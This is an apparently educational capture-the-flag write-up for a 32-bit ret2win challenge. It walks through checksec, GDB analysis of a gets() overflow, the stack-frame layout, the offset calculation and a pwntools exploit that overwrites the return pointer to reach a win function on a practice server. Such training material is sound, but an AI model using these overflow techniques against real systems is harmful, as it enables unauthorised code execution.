win32

Solving a 32-bit ret2win.

This binary is our first introduction to a stack buffer overflow. A buffer overflow means writing more bytes than were allocated for a buffer, which (un)intentionally overwrites the adjacent data. The vulnerability arises when the size of the input is not checked and the stack is not protected (for example, by a canary). We will check both conditions before attempting the buffer overflow.

What is the red line in the instructions?

From the instructions, we see this line:

nc vunrotc.cole-ellis.com 1100

nc (aka netcat) is a utility that lets a user connect to an IP address at a port. What does that even mean? Let's break it down:

  • Every computer on a network has an IP address. It identifies that computer to the other machines it talks to.

  • Every computer has a list of ports (ranging from 0-65535). These ports host various services that other computers can access. Websites using HTTPS are served on port 443. This means that when you access a website, under the hood you connect to a remote computer on port 443.

    • The hostname in a URL is a human-readable alias for the IP address underneath. DNS resolves the hostname to an IP address; we use hostnames because they are easier to remember.

  • The first 1024 ports are reserved for various services (like HTTPS, HTTP, SSH, etc.). The rest of the ports are available for custom setup and use.

  • In this case, I set up the same binary I provided in the challenge to run on port 1100. When you connect to that port, you are connecting to the binary. When you pass your payload to the port, and it is executed, it correctly finds and prints my flag file. This means I provided you source code to prepare your payload, and a server for you to execute your payload so I can hide the flag.

If you want to test this, just run that netcat command in the terminal. You'll notice it prints the same output as running the win32 binary.
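For readers curious about what netcat does under the hood, here is a minimal Python sketch that opens the same kind of TCP connection using only the standard library. The function name `read_banner` and the 5-second timeout are assumptions made for illustration; the host and port in the usage comment are the ones from the instructions.

```python
import socket

def read_banner(host: str, port: int, timeout: float = 5.0) -> bytes:
    """Connect to host:port over TCP and return the first chunk the service sends."""
    with socket.create_connection((host, port), timeout=timeout) as conn:
        return conn.recv(4096)

# Usage (needs network access to the challenge server):
# print(read_banner("vunrotc.cole-ellis.com", 1100).decode(errors="replace"))
```

The function only reads; sending input to the service would use `conn.sendall(...)` on the same socket.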

Now, let's move on to the binary.

Checking Security

Let's make the first security check using checksec.

The first and probably most important thing is that this is a 32-bit binary. This means that when we pass parameters, we pass them on the stack. When the call instruction is reached, the top of the stack holds the first parameter, the next slot holds the second parameter, and so on.
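To make the parameter order concrete, here is a toy Python model (not real machine code) of a 32-bit caller under the common cdecl convention: the arguments are placed right-to-left, so the first parameter ends up on top of the stack. The function name `push_args` and the sample values are hypothetical.

```python
def push_args(args):
    """Model a caller pushing arguments right-to-left onto a stack.

    The returned list grows toward its end, so stack[-1] is the top of the stack.
    """
    stack = []
    for value in reversed(args):
        stack.append(value)
    return stack

stack = push_args([0xAAAA, 0xBBBB, 0xCCCC])
print(hex(stack[-1]))  # top of the stack: the first parameter
print(hex(stack[-2]))  # one slot below the top: the second parameter
```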

We see that all protections are disabled. The most important check for the buffer overflow is that the canary is disabled.

Let's go into GDB and find where this function takes input. Inside read_in:

We see that this program uses gets for input. The man page says this about gets:

The most important thing about gets is that gets does not check the size of the input. This means we can write as much as we want to the stack. This is the vulnerability that we are going to exploit.

Now that both vulnerability prerequisites have been checked, let's start figuring out how to execute the buffer overflow.

Disassembly

For this challenge, I am going to provide the source code to understand what is happening:

Let's do our analysis in GDB assuming that we don't have the source code (because, typically, we won't) and just use it to explain why things happen.

First, we check the functions available:

The three functions that we are interested in are win, read_in, and main. win logically appears to be the target, so let's figure out what happens there:

win makes a call to system, which the man page says takes a char* (string) argument. From the source code, we see that it is passed the argument "cat flag.txt", meaning that it opens the flag file and prints its contents.

Now, let's check main:

We see that main just appears to call read_in and then return. So, let's go check read_in:

We see that this is where gets() is called and where we are going to overflow the buffer. We also notice that malloc() has yet to be called, meaning that the data is not being placed on the heap.

To confirm this, we check what's being passed to gets(). Let's set a breakpoint right before the call to gets() and check:

x/wx $esp (or pxw @ esp in radare2) shows me the value on the top of the stack. In 32-bit, this is how we pass parameters. This means that 0xffffd618 is being passed as the parameter to gets(), which is the address of the buffer.

Something peculiar that we notice is that 0xffffd618 (the location we're writing to) is close to the stack pointer (0xffffd600). I wonder, are we writing to the stack? The short answer is yes, but let's confirm. Run info proc mappings (dm in radare2) to check the bounds of the various memory segments:

We see that our stack is located between 0xfffdd000 and 0xffffe000. Our buffer address is inside this range, meaning we are writing to the stack.
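The same range check can be written out in Python. This is only a sketch of the comparison, using the addresses quoted above; the helper name `in_region` is made up for the example.

```python
STACK_START = 0xfffdd000  # lower bound of the stack mapping
STACK_END = 0xffffe000    # upper bound of the stack mapping
BUFFER_ADDR = 0xffffd618  # the argument passed to gets()

def in_region(addr, start, end):
    """Return True if addr lies in the half-open range [start, end)."""
    return start <= addr < end

print(in_region(BUFFER_ADDR, STACK_START, STACK_END))
```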

What power do we have?

Remember earlier that I said that gets() does no bounds checking, meaning that we can write as many bytes as we want? There are some important things on the stack right now, so let's go check them out.

This looks like a lot of gibberish, but two numbers stand out in particular:

Why these two? The short answer is that the numbers were different! If we check info proc mappings again, we see:

This is executable memory located inside the win32 file. This is the code segment. This means that these locations are addresses in the code. Let's check what's here:

We see that these both point to instructions. The first one points to somewhere at the top of read_in, and the second one back in main. The first one is our base pointer (aka ebp) and the second one is the return pointer.

Let's understand how this happened.

Stack Frame

When a function is called, the following happens:

  1. The return pointer is pushed onto the stack. This is the address of the next instruction to execute after the function returns.

  2. The code then goes to the location referenced in the call instruction.

  3. The base pointer is pushed onto the stack. This saves the caller's base pointer so it can be restored later. We see that here in the code:

  4. The stack pointer's value is copied into the base pointer (mov ebp, esp). This is the new base pointer.

  5. The stack pointer is moved down to make space for local variables.

  6. The function is executed.

When the function returns, the following happens:

  1. The stack pointer is reset to the base pointer's value (mov esp, ebp), which discards the local variables.

  2. The saved base pointer is popped off the stack back into ebp.

  3. The return pointer is popped off the stack and the code jumps to that location.
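The call and return sequences above can be traced with a toy Python model. This is a simplified sketch, not an emulator: the class name `ToyCPU`, the starting register values, and the sample addresses are all hypothetical, and memory is just a dictionary of 4-byte slots.

```python
class ToyCPU:
    """Tiny model of esp, ebp, and eip for a 32-bit call and return."""

    def __init__(self, esp=0x1000, ebp=0x2000):
        self.mem = {}
        self.esp = esp
        self.ebp = ebp
        self.eip = 0

    def push(self, value):
        self.esp -= 4               # the stack grows toward lower addresses
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value

    def call(self, target, return_addr):
        self.push(return_addr)      # return pointer goes on the stack
        self.eip = target           # execution moves to the function

    def prologue(self, locals_size):
        self.push(self.ebp)         # push ebp: save the caller's base pointer
        self.ebp = self.esp         # mov ebp, esp: new base pointer
        self.esp -= locals_size     # sub esp, N: space for local variables

    def epilogue(self):
        self.esp = self.ebp         # mov esp, ebp: discard the locals
        self.ebp = self.pop()       # pop ebp: restore the caller's base pointer
        self.eip = self.pop()       # ret: jump to whatever value is stored there

cpu = ToyCPU()
cpu.call(target=0x08049000, return_addr=0x0804a000)
cpu.prologue(locals_size=0x30)
cpu.epilogue()
print(hex(cpu.eip), hex(cpu.esp), hex(cpu.ebp))
```

Note that `epilogue` jumps to whatever value sits in the return slot; nothing in the model (or on the real CPU) checks that it is the value `call` stored.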

How do we leverage this?

  • We know that the return pointer is at some location in memory. When we call read_in, we subtract from the stack pointer.

  • We will write some number of bytes inside the space that was just allocated for the function.

  • If we write enough bytes (because the program isn't checking), we can overwrite the return pointer placed on the stack.

  • When the function terminates, it knows no better: it finds where it stored the return pointer and goes there. It does not verify that the return pointer is a valid place in memory or that it's the same one it stored initially; it just goes there.
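The idea in the list above can be modeled in a few lines of Python. This is a sketch under stated assumptions: the frame is reduced to a buffer, a saved base pointer, and a return pointer; the 16-byte buffer size, the saved ebp value, and the original return address are hypothetical. Only 0x080491a6 (the address of win) comes from this walkthrough.

```python
import struct

BUF_SIZE = 16  # hypothetical buffer size, chosen only for this model

def new_frame(saved_ebp, return_addr):
    """Lay out a frame as bytes: [buffer][saved ebp][return pointer]."""
    return bytearray(BUF_SIZE) + struct.pack("<II", saved_ebp, return_addr)

def unchecked_write(frame, data):
    """Copy data to the start of the buffer with no length check, as gets() would."""
    frame[0:len(data)] = data

def return_target(frame):
    """Read the 4-byte return pointer that the function would jump to on return."""
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]

# Hypothetical saved ebp and original return address.
frame = new_frame(saved_ebp=0xffffd658, return_addr=0x08049200)

# Fill the buffer, run over the saved ebp, then replace the return pointer.
unchecked_write(frame, b"A" * (BUF_SIZE + 4) + struct.pack("<I", 0x080491a6))
print(hex(return_target(frame)))
```

A write of `BUF_SIZE` bytes or fewer leaves the return pointer untouched; anything longer starts eating into the saved values.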

Let's make this happen.

Exploitation

We are still breakpointed at the call to gets(). Let's check the stack again:

This is the address we are going to write to. As a reminder, this is where we found the return pointer:

This means that in order to overwrite the return pointer, we need to write from 0xffffd618 (the start of the buffer) up to 0xffffd64c (where the return pointer is stored). How many bytes is this? Let's get some Python practice:
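A minimal sketch of that subtraction, taking the buffer address 0xffffd618 that was passed to gets() as the start of the write and 0xffffd64c as the location of the return pointer (the variable names are made up for the example):

```python
buffer_start = 0xffffd618     # address passed to gets()
return_ptr_addr = 0xffffd64c  # where the return pointer is stored

offset = return_ptr_addr - buffer_start
print(offset, hex(offset))
```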

This means that we need to write 52 bytes, and then we need to overwrite the return pointer. But where do we want to go? The win function! Let's get that address:

Let's use Python to make this a payload:

And what happens when we run this?

We... crashed. What does that mean? That means we either corrupted memory or we tried to execute memory that we weren't allowed to. Let's retry this in GDB and watch the execution:

It's saying that it reached the address 0x35343331 and stopped. What does this mean?

  1. We now know that we control execution and were able to successfully deviate execution to another spot in memory.

  2. We didn't quite do it right because we didn't get to the win function. We need to figure out what happened.

Let's dive deeper into what is happening here:

  1. We notice that 0x35343331 is the ASCII encoding of the characters 5431, which is 1345 read backward. 1345 is the start of the address portion of our payload. It appears backward because the binary runs on a little-endian architecture.

  2. We also notice that 134517158 is the decimal form of 0x080491a6, which is the address of win. Our payload carried the address as decimal text rather than as raw bytes.
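Both observations can be checked in Python with the standard library. This sketch only decodes the two numbers from this walkthrough; the variable names are made up for the example.

```python
import struct

F_WIN = 0x080491a6      # address of win
CRASH_EIP = 0x35343331  # address GDB reported at the crash

# The address of win written out as decimal text.
as_decimal_text = str(F_WIN)
print(as_decimal_text)

# The crash address laid out in memory order (little-endian).
crash_bytes = struct.pack("<I", CRASH_EIP)
print(crash_bytes)
```

The four bytes recovered from the crash address match the first four characters of the decimal text, which is how we can tell the address was sent as digits.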

How can we get the hexadecimal to appear correctly in the payload?

This is where pwntools comes in. Pwntools has a packing function that converts an integer into bytes of the correct size and byte order. In 32-bit, this function is p32(). We modify the exploit to be:
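To see what packing produces without installing pwntools, here is a sketch using the standard library's struct module, which yields the same four bytes as p32() with its default little-endian setting. The helper name `pack32` is hypothetical and is not part of pwntools.

```python
import struct

F_WIN = 0x080491a6  # address of win

def pack32(value):
    """Pack an unsigned 32-bit integer as 4 little-endian bytes."""
    return struct.pack("<I", value)

packed = pack32(F_WIN)
print(packed.hex())  # least significant byte comes first
print(len(packed))   # 4 bytes, versus 9 characters of decimal text
```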

However, the packed bytes are not all printable characters, so they can't simply be copied and pasted into the program's input. Thankfully, pwntools comes to save us again and gives us a way to send this payload to the binary. Consider the following exploit:

Let's break this exploit down:

  • from pwn import * -- This imports the pwntools library into the program, just like an #include in C-type languages.

  • proc = process('./win32') -- This creates a process object that runs the win32 binary.

  • padding = b'A' * 0x34 -- This creates a variable that is 52 bytes of A characters. Note that you could use any characters, but A (0x41) is a common choice.

  • f_win = 0x080491a6 -- This creates a variable that is the address of the win function. It's common to store your addresses as variables so it's easier to read.

  • payload = p32(f_win) -- This creates a variable that is the address of the win function, but in the correct format for the binary.

  • buf = padding + payload -- This is the final string that will get sent off to the process.

  • proc.sendline(buf) -- This sends the payload to the process.

  • proc.interactive() -- This allows us to interact with the process after the payload is sent.
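Putting the lines above together, here is a sketch of the script arranged so that the payload can be built and inspected without pwntools installed. Two things differ from the breakdown and are assumptions of this sketch: the code is wrapped in the hypothetical functions `build_payload` and `run_local`, and the address is packed with struct.pack("<I", ...), which gives the same bytes as p32() in its default little-endian setting.

```python
import struct

PADDING_LEN = 0x34  # 52 bytes between the buffer and the return pointer
F_WIN = 0x080491a6  # address of win

def build_payload() -> bytes:
    """Return the padding followed by the packed address of win."""
    padding = b"A" * PADDING_LEN
    return padding + struct.pack("<I", F_WIN)

def run_local(path="./win32"):
    """Send the payload to a local copy of the binary (requires pwntools)."""
    from pwn import process  # imported here so build_payload works without pwntools

    proc = process(path)
    proc.sendline(build_payload())
    proc.interactive()

print(len(build_payload()))
```

Calling `run_local()` from the directory that contains the binary performs the same steps as the script described above.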

Let's run this exploit:

We see that cat gets called! That means our exploit worked, but since we're running locally, there is no flag.txt to find. Let's switch our process to target the remote server:

Now let's run this:

As we can see, the flag is printed!
